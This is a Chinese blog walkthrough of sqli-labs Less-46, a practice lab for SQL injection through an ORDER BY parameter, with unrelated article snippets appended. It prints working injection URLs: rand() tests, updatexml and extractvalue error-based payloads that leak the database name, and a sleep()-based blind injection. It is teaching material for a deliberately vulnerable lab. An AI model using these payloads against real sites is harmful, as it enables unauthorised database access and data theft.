sqli-labs(less-46)order by 注入

我们打开sql-labs的第46关然后在输入框内输入?id=1时会发现页面没有任何的变化,此时我们用Visual Studio Code查看第46关的代码

此时我们发现sql语句是$sql = "SELECT * FROM users ORDER BY $id";  ,所以现在我们需要了解一下order by语句的作用。

在SQL语句中,asc是指定列按升序排列,desc则 是指定列按降序排列。
select * from users order by 1 desc; 使用降序进行排列
select * from users order by 1 asc;使用升序进行排列

这时我们就知道了,sql语句只有order by后面的参数是我们可控的,所以我们可以输入?sort=1,在这里sort=1的意思就是以第一列数据也就是id进行排序。

http://127.0.0.1/sincer/Less-46/?sort=1

  

http://127.0.0.1/sincer/Less-46/?sort=2

此时我们输入?sort=2,就是以USERNAME进行排序。

 

输入?sort=3时,会以PASSWORD进行排序。 

当我们输入?sort=4时会报错,因为没有第四列。

 注入点测试

127.0.0.1/sincer/less-46/?sort=rand(true)

http://127.0.0.1/sincer/less-46/?sort=rand(false)

 报错注入(获取表名)

http://127.0.0.1/sincer/less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)

 或者

http://127.0.0.1/sincer/less-46/?sort=(extractvalue(1,concat(0x7e,(database()),0x7e)))--+

 时间盲注

http://127.0.0.1/sincer/Less-46/?sort=1%20and%20if(substr(database(),1,1)=%27s%27,1,sleep(1))--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/492354.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

区分服务 DiffServ

目录 区分服务 DiffServ 区分服务的基本概念 区分服务 DiffServ 的要点 每跳行为 PHB DiffServ 定义的两种 PHB 区分服务 DiffServ 区分服务的基本概念 由于综合服务 IntServ 和资源预留协议 RSVP 都较复杂,很难在大规模的网络中实现,因此 IET…

F2图例封装 - Line

基于vue3 和 F2 3.5.0 <template><div :style"{ minHeight: ${height}px, width: 100% }" ref"container"><canvas v-show"showChart" :id"chartId" class"chart-canval"></canvas><empty-box v…

主数据管理是数字化转型成功的基石——江淮汽车案例分享

汽车行业数字化转型的背景 在新冠疫情导火索的影响下&#xff0c;经济全球化政治基础逐渐动摇。作为全球最大的汽车市场&#xff0c;我国的汽车市场逐渐由增量转为存量市场。 在数字化改革大背景下&#xff0c;随着工业4.0时代的到来&#xff0c;江淮汽车集团力争实现十四五数…

Object中的hashCode()

让hashcode方法的返回值为地址 vm参数中输入-XX:UnlockExperimentalVMOptions -XX:hashCode4&#xff0c;如下图&#xff1a; 参考 搞懂JAVAObject中的hashCode()_java_脚本之家 JDK核心JAVA源码解析(9) - hashcode 方法 - 知乎

《深入浅出 Spring Boot 3.x》预计3月份发版

各位&#xff0c;目前本来新书《深入浅出 Spring Boot 3.x》已经到了最后编辑排版阶段&#xff0c;即将在3月份发布。 目录&#xff1a; 现在把目录截取给大家&#xff1a; 主要内容&#xff1a; 本书内容安排如下。 ● 第 1 章和第 2 章讲解 Spring Boot 和传统 Spri…

并查集及应用

并查集的应用&#xff1a; 合并两个集合 查询某个元素的祖宗节点 扩展&#xff1a; 记录每个集合的大小&#xff08;绑定到根节点&#xff09; 记录每个点到根节点的距离&#xff08;绑定到每个元素上&#xff09; 二元或多元判断的时候用到的两种方法&#xff1a;扩展域并查集…

怎么看伦敦银走势图?这个信号威力无穷.....

伦敦银走势图中的黄金交叉是一种特殊的技术信号&#xff0c;它一般是指较短期的移动平均线向上穿越较长期的移动平均线。在许多情况下&#xff0c;金叉都被视为看涨的信号&#xff0c;因为移动平均线所衡量的是银价在某个时段内的均价——从这个角度看&#xff0c;短期平均线位…

时域离散信号的产生

时域离散信号的产生 函数汇总信号产生 单位抽样序列 \textcolor{plum}{\small \text{单位抽样序列}} 单位抽样序列 单位阶跃序列 \textcolor{plum}{\small 单位阶跃序列} 单位阶跃序列 正余弦序列 \textcolor{plum}{\small 正余弦序列} 正余弦序列 锯齿波三角波序列 \textcolor…

H5多用途的产品介绍展示单页HTML5静态网页模板

H5多用途的产品介绍展示单页HTML5静态网页模板 源码介绍&#xff1a;一款H5自适应多用途的产品介绍展示单页HTML静态网页模板&#xff0c;可用于团队官网、产品官网。 下载地址&#xff1a; https://www.changyouzuhao.cn/13534.html

HTTPS对HTTP的加密过程

1、HTTPS是在HTTP的基础上&#xff0c;引入了一个加密层&#xff08;SSL&#xff09;&#xff0c;对数据进行保护&#xff0c;HTTP 是明文传输的&#xff08;不安全&#xff0c;很可能会被运营商通过referer劫持&#xff0c;或者黑客通过修改链接来窃数据&#xff09; 2、加密…

js:通过input标签或Drag拖拽文件实现浏览器文件上传获取File文件对象

文档 https://developer.mozilla.org/zh-CN/docs/Web/API/Filehttps://developer.mozilla.org/zh-CN/docs/Web/API/HTMLElement/drag_event 通过读取文件可以获取File对象的信息 lastModified: 1707210706000 lastModifiedDate: Tue Feb 06 2024 17:11:46 GMT0800 (中国标准…

API接口技术开发拼多多API获取宝贝详情页实时数据、原价、销量、主图、优惠券等参数可支持高并发调用接入演示

拼多多的API接口技术可以用于开发能够获取商品详情页实时数据、原价、销量、主图、优惠券等参数的应用程序&#xff0c;并支持高并发调用。以下是一些关于如何实现这一功能的分析&#xff1a; 注册和认证&#xff1a;您需要在开放平台注册账号&#xff0c;并完成必要的实名认证…